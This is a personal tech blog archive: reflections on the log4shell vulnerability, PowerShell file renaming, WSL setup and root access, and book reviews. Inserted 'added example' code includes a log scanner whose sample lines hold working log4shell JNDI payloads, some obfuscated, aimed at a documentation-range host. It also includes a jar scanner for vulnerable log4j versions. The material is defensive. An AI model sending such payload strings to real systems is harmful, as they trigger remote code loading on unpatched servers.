Saturday, December 18, 2021

Random thoughts on log4shell

Just as I was doing my daily random YouTube video watching, I saw one of the channels I subscribe to put up this. Of the content I have found so far, this one made it easiest for me to catch up with the details of this vulnerability.



If you prefer reading to watching a video, there is another online post about the related exploit at Fastly that is easy to read. Based on the diagram in that article, I think (maybe naively, and maybe it could be sufficient as a mitigation plan, I don't know) that deny-all firewall rules with allow lists would be the best mitigation option while waiting for a patch. This stops the "query LDAP" path at the first phase, so the vulnerability never gets a chance to reach the second phase.
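The first phase in that diagram is a request carrying a JNDI lookup string reaching log4j, so one thing a team waiting on the patch can do is look for such strings in what its servers have already logged. The Python below is an added example, not code from the post or the video it refers to: it scans constructed sample access-log lines for `${jndi:...}` and also unwraps the URL-encoded and nested-lookup variants (`${lower:j}`, `${::-j}`) that were used to get past naive string matches; those variants go a bit beyond what the post itself describes. The sample lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Added example, not part of the original post. Finds log4j lookup strings of
# the form ${jndi:...} in log lines after undoing two common ways of hiding
# them: URL encoding, and nesting other lookups such as ${lower:j} or ${::-j}
# (the text after ":-" is a default value that log4j substitutes as-is).

LOOKUP = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...} with no nested braces
MAX_ROUNDS = 20                           # guard against pathological input


def resolve_lookup(body: str) -> str:
    """Evaluate one innermost lookup body the way log4j's substitutor would,
    for the handful of lookups that matter when de-obfuscating."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> "j"
        return body.split(":-", 1)[1]
    return body                           # unknown lookup: keep its text so the loop ends


def find_jndi_lookups(line: str) -> list:
    """Return the JNDI lookup bodies hidden in one log line (empty list if none)."""
    found = []
    text = unquote(line)                  # %24%7Bjndi... -> ${jndi...

    def repl(m):
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            found.append(body)
            return "<jndi-removed>"       # contains no "${", so it is not re-matched
        return resolve_lookup(body)

    for _ in range(MAX_ROUNDS):           # resolve inside-out until nothing changes
        text, n = LOOKUP.subn(repl, text)
        if n == 0:
            break
    return found


def scan_lines(lines) -> list:
    """(line number, decoded lookup) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        for body in find_jndi_lookups(line):
            hits.append((i, body))
    return hits


# Constructed sample access-log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.9/b} HTTP/1.1" 404 "-" "curl/7.68.0"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/c}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fd%7D HTTP/1.1" 200 "-" "-"',
    '203.0.113.10 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${total} HTTP/1.1" 200 "-" "-"',
]

if __name__ == "__main__":
    for lineno, body in scan_lines(SAMPLE_LOG):
        print(f"line {lineno}: {body}")
```

Resolving lookups inside-out rather than matching a fixed string is the point: the second, third and fourth sample lines all end up as the same `${jndi:ldap://...}` once the wrapper lookups are evaluated, while the harmless `${total}` on the last line is left alone.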



Anyway, this log4shell vulnerability has caught wide attention since last week. It has been a disastrous event for IT teams. They need to find ways to check whether their servers are impacted, look for automated ways to detect whether the log4j library exists on their machines, and ask: how serious is this? Is there a patch? While waiting for the patch, what's next? How do we mitigate the risk for the time being? Are mitigations in place? What other potential risks are there? And things got more worrying when the first log4j patch, which disabled the JNDI feature, did not fix this mess completely!
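One of those "automated ways to detect whether the log4j library exists on the machines", as an added example that is not from the original post: the script below walks a directory for Java archives, looks inside nested jars (wars, ears, uber-jars), and for every log4j-core it finds reports the version, whether `JndiLookup.class` is still in the jar, and whether it is older than 2.17.0, the release the post calls the third patch. It assumes the jar's manifest carries `Implementation-Version`, as real log4j-core jars do, with the file name as a fallback; the archives it scans in its demo are constructed in a temporary directory.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Added example, not part of the original post. Walks a directory for Java
# archives, recurses into jars nested in wars/ears/uber-jars, and reports every
# log4j-core found: its version, whether JndiLookup.class is still inside, and
# whether it is older than 2.17.0 (the release the post calls the third patch).
# Assumption: MANIFEST.MF carries Implementation-Version, as real log4j-core
# jars do; the file-name fallback covers jars that lack it.

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_MARKER_CLASS = "org/apache/logging/log4j/core/Logger.class"
MANIFEST_PATH = "META-INF/MANIFEST.MF"
PATCHED_VERSION = (2, 17, 0)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparseable -> (0, 0, 0)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return (0, 0, 0)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_archive(data: bytes, name: str) -> list:
    """Inspect one archive held in memory; one finding per log4j-core jar inside it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if CORE_MARKER_CLASS in names:
            version = "unknown"
            if MANIFEST_PATH in names:
                manifest = zf.read(MANIFEST_PATH).decode("utf-8", "replace")
                m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
                if m:
                    version = m.group(1)
            if version == "unknown":          # fall back to log4j-core-<ver>.jar
                m = re.search(r"log4j-core-(\d[\w.\-]*)\.jar$", name)
                if m:
                    version = m.group(1)
            has_jndi = JNDI_LOOKUP_CLASS in names
            findings.append({
                "path": name,
                "version": version,
                "has_jndi_lookup": has_jndi,
                # Lookup class still present and older than the patched release.
                "needs_patch": has_jndi and parse_version(version) < PATCHED_VERSION,
            })
        for entry in sorted(names):           # nested archives
            if entry.endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(inspect_archive(zf.read(entry), f"{name}!/{entry}"))
                except zipfile.BadZipFile:
                    pass                      # not really a zip: skip it
    return findings


def scan_dir(root) -> list:
    """Scan every archive under root; corrupt archives are skipped."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix in ARCHIVE_SUFFIXES:
            try:
                findings.extend(inspect_archive(p.read_bytes(), str(p)))
            except zipfile.BadZipFile:
                pass
    return findings


def make_sample_jar(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar (class bodies are dummies)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST_PATH, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(CORE_MARKER_CLASS, b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo() -> list:
    """Build a constructed tree (old jar, patched jar, war holding an old jar with
    JndiLookup.class already removed) in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "log4j-core-2.14.1.jar").write_bytes(make_sample_jar("2.14.1"))
        (root / "log4j-core-2.17.0.jar").write_bytes(make_sample_jar("2.17.0"))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar",
                        make_sample_jar("2.14.1", with_jndi=False))
        (root / "app.war").write_bytes(war.getvalue())
        return scan_dir(root)


if __name__ == "__main__":
    for f in demo():
        flag = "NEEDS PATCH" if f["needs_patch"] else "ok"
        print(f'{flag:11} {f["version"]:8} jndi={f["has_jndi_lookup"]} {f["path"]}')
```

Two design points: the scanner keys on a class that is only in log4j-core rather than on the file name, because a renamed or shaded copy inside a fat jar is exactly the one a name-based search misses; and a jar from which `JndiLookup.class` has been removed is reported but not flagged, since that is the state a stop-gap mitigation leaves behind.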

I can imagine the team's reaction when the R&D team downloaded the log4j patch, applied the change to the repository, rebuilt the application/system, went through QA testing and was ready for release... Then, alas! Another log4j patch is released. As I checked the log4j security page while writing this, a third patch has been released.

And if you are in a customer-facing support team... you will need to know what the vulnerability is about, whether it impacts the system you are supporting, and what the recommendations are. You need to do a lot of studying while waiting for R&D's reply. And you need to make sure your customers feel secure, happy and satisfied with your response. (I am trying to imagine what the customer's expectations are. :D)

Lastly, if you are interested in knowing more about JNDI, visit the tutorial here. The log4j lookup function is actually quite handy. Based on today's update for log4j 2.17.0 (the third patch I mentioned earlier), you must explicitly enable the JNDI lookup in order to use this function. Like the YouTuber said, it is not a log4j bug or a JNDI problem; it's about how the function is being called/used. And of course, good coding practice, always validating/sanitizing user input, can avoid this!

This is not a technical post, just a record of the thoughts I have so far. I heard developers saying, "Why use log4j? We already dropped log4j from our system; other dev teams should have done the same." "We should use a non-popular library so no one would target our system." I was like... huh? Found someone more naive than me! Other devs out there, I just... wish you well.

Useful link(s)





Thursday, November 18, 2021

Rename files using PowerShell

I definitely miss Linux a lot. However, my main working environment is Windows. It has been 5 years!

Just had a call with one of the customers. I needed to rename 100+ files. Sigh. During the call I was under time pressure, and I couldn't tolerate continuous trial and error. So I used the slowest and safest, but human-error-prone, way of doing it: rename them manually, one by one.

We had a moment of silence in the call, then we suggested syncing up via email. Phew, the pressure went away. So I did a quick Google search. I have tried searching for this solution several times, but I never got it right, never got it to work. Probably I am still unconsciously resisting PowerShell. Anyway, recently I seem to have more luck with PowerShell!

Then, within a few minutes, I finally found the "ultimate" solution!

Get-ChildItem *.txt | Rename-Item -NewName { $_.Name -replace 'a','b' }
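A fuller version of that one-liner, as an added example that is not from the original post: preview first, check that no two files would map to the same new name before touching anything, and use a capture group when the new name has to be computed. Keep in mind that -replace takes a regular expression, so a literal dot or bracket in the search text needs escaping. The file names it assumes (report-1.txt, report-12.txt, data-a.txt and so on) are constructed.

```powershell
# Added example, not from the original post. Assumes a folder of constructed
# files such as report-1.txt, report-12.txt, data-a.txt.

# 1. Dry run: -WhatIf prints every rename without performing it.
Get-ChildItem -File -Filter *.txt |
    Rename-Item -NewName { $_.Name -replace 'a', 'b' } -WhatIf

# 2. Collision check before the real run. $planned also contains the names that
#    do not change, so a rename onto an existing untouched file is caught too.
$files   = Get-ChildItem -File -Filter *.txt
$planned = $files | ForEach-Object { $_.Name -replace 'a', 'b' }
$dupes   = $planned | Group-Object | Where-Object { $_.Count -gt 1 }
if ($dupes) { throw "Rename would collide on: $($dupes.Name -join ', ')" }
$files | Rename-Item -NewName { $_.Name -replace 'a', 'b' }

# 3. -replace is regex, so use a capture group when the new name is computed:
#    report-7.txt -> report-007.txt
Get-ChildItem -File -Filter 'report-*.txt' | ForEach-Object {
    if ($_.BaseName -match '^report-(\d+)$') {
        $new = 'report-{0:d3}{1}' -f [int]$Matches[1], $_.Extension
        # -LiteralPath so that [ ] in a file name are not treated as wildcards
        Rename-Item -LiteralPath $_.FullName -NewName $new
    }
}
```

The collision check matters for a batch of 100+ files because Rename-Item stops at the first name that already exists, leaving the folder half renamed with no easy way to tell which half.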


And then I suddenly realised I had forgotten how to do this in Linux... Sigh.

* update

This is the equivalent Linux command:

rename 's/a/b/' *.txt

(Note that this is the Perl rename script, which takes a s/// expression and is installed as prename or file-rename on some distributions; the util-linux rename found on others uses a different syntax, rename a b *.txt, and replaces only the first occurrence in each name. Both accept -n for a dry run.)


Tuesday, November 16, 2021

WSL - Windows Subsystem for Linux

I am not sure how long this feature has been available in Windows 10. Recently I screened through the "Turn Windows features on or off" list again and found it. I got excited and turned it on. I have to admit, this is the best solution for me as of now, since I cannot install VirtualBox on this laptop for whatever reason or policy. :P

I did a search on Google and found the page Install WSL by Microsoft. But it says... You must be running Windows 10 version 2004 and higher (Build 19041 and higher) or Windows 11. I checked my system; it is running a lower version. :(

Well, do you think that would stop me from continuing? Of course not! If it is available in the list, of course it should be ready to use!

So I went ahead and enabled it. Then maybe I restarted the laptop. In case you want to know how and where to enable it, follow these steps.

1. Open Control Panel
2. Click on "Programs"
3. Click on "Turn Windows features on or off"
4. A dialog box pops up; scroll to the end. You'll see this.



5. Tick the checkbox beside Windows Subsystem for Linux
6. Then maybe restart your system? (I can't recall whether I did this or not)

Next, install. I selected Ubuntu 20.04 LTS.

7. Launch Microsoft Store
8. Search for Linux
9. Click on the Linux distribution that you want to install.
10. Click on the Get button to download
11. Follow the instructions to install
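The same procedure from the command line, as an added example that is not from the original post. It is meant for an elevated PowerShell window; "Ubuntu-20.04" is the Store name of the distribution chosen above, the user name is an assumption, and steps 7 to 11 still go through the Store on a build this old. One thing worth knowing on such a build is that the feature gives you WSL 1, and WSL 1 does not support raw sockets, which is why packet-crafting and scanning tools cannot work inside it.

```powershell
# Added example, not from the original post. Run in an elevated PowerShell
# window. "Ubuntu-20.04" is the Store name assumed here; "alice" is a made-up user.

# Steps 1-6: enable the optional feature (same as ticking the checkbox).
$feat = Enable-WindowsOptionalFeature -Online `
            -FeatureName Microsoft-Windows-Subsystem-Linux -NoRestart
if ($feat.RestartNeeded) { Write-Warning "Restart Windows before using WSL" }

# Confirm it took: State should read Enabled.
Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux |
    Select-Object FeatureName, State

# Steps 7-11 go through the Microsoft Store. Afterwards, list what is installed
# and start a shell in it.
wsl --list                                   # on builds older than 1903 use: wslconfig /l
wsl -d Ubuntu-20.04                          # open a shell in that distribution

# Forgotten Linux password: start the distro as root and set a new one.
wsl -d Ubuntu-20.04 -u root -- passwd alice
```

The last line is also the security point to take away: any Windows user who can run wsl.exe can start the distribution as root without knowing a Linux password, so the Linux password protects nothing from someone already on the Windows account.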

Gaodim! (Done!)

One thing that doesn't work with this WSL is network-related commands. Here I list the few commands I tried which do not work, even after I installed the necessary packages.

$ show ip route
$ nmap
$ hping3


For example, with the hping3 command you'll get the open_sockraw permission error, even when you run it with sudo!



And the best part is, you cannot reboot. :D Unless you restart Windows. I forgot what triggered me to do the reboot...



You can run this from the command prompt. Open a command-prompt (DOS-style) window and type wsl. You will get the shell running inside that window!

In case you forgot your password, try this in the command-prompt window.

wsl -u root

It works like magic! (From that root shell, passwd <username> sets a new Linux password. Keep in mind what this shows: anyone who can run wsl as your Windows user can become root in the distribution without knowing any Linux password, so the Linux password is not a security boundary on its own.)



That's all for my sharing today. If you looked at the screenshot earlier, I enabled Windows Sandbox as well. It is another nice, cool feature that I use for some naughty testing! I'll find time to share it next time.

Friday, August 20, 2021

Restart a Windows server command

This is the command to restart the server immediately. Keeping a copy here for me to refer to next time. (/r reboots rather than powering off, and /t 0 sets no delay; add /f if you also want running applications forced closed, otherwise an application that blocks shutdown can hold the restart up.)

shutdown /r /t 0

Friday, July 30, 2021

[There's a Book] 一看就懂的上古史 (Ancient History at a Glance)

After finishing this book I had a feeling of "finally finished it". After all, it is a subject I like, but because I have too many interests, plus laziness, I only finished this book five years after buying it, which is a bit much. Still, at least now I can cross one item off my checklist. Happy-ing.

This is a book that explains a deep subject in simple terms. I like how the author mixes history, archaeology, legend and myth together, writes out the connections between them, or makes the legends and myths realistic and logical, which gave me a kind of "so that's how it was" understanding. Still, if one really travelled back to ancient times, I don't know what it would be like. Web novels mostly have the protagonist travel to a fictional era or to ancient dynasties. If a story were written about travelling back to prehistoric times, to a matrilineal society, could slavery be prevented? My thoughts have wandered far.

This video is my sharing after reading the book. I hope you like it.



Tuesday, June 29, 2021

[There's a Book] 老子的部落格 | Lao Tze's blog

I was still wondering whether to also share my YouTube channel of the same name on this blog. But this video introduces Lao Tze's three treasures for self-cultivation and dealing with the world, which I want to share with more people. After thinking it over, I'll just write it.

This series evolved from wanting to show off the things in my study (storage room). Without further ado, straight to the topic.

Lao Tze's three treasures for self-cultivation and dealing with the world:

1. Compassion (慈).
2. Frugality (儉).
3. Not daring to be first in the world (不敢為天下先).

For details, see the video.



For even more detail, go find the book! ^^